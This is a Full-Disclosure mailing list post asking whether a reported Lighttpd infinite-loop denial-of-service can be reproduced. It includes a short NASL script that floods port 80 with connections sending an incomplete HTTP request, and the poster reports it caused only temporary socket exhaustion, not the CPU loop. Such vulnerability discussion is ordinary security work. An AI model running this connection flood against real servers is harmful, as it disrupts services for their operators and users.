> Robert Jakabosky discovered an infinite loop triggered by a connection > abort when Lighttpd processes carriage return and line feed sequences.
Could anybody reproduce this DoS? I tried this NASL script without success. The server rejects connections for about one minute (because of kazillons of sockets in TIME_WAIT), but it only affects the attacking source IP and I could not launch any CPU loop. $ more /tmp/ec.nasl i= 0; while (s = open_sock_tcp(80)) { i ++; send(socket: s, data: 'GET / HTTP/1.0\r\n'); close(s); } display(i, ' done\n'); $ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/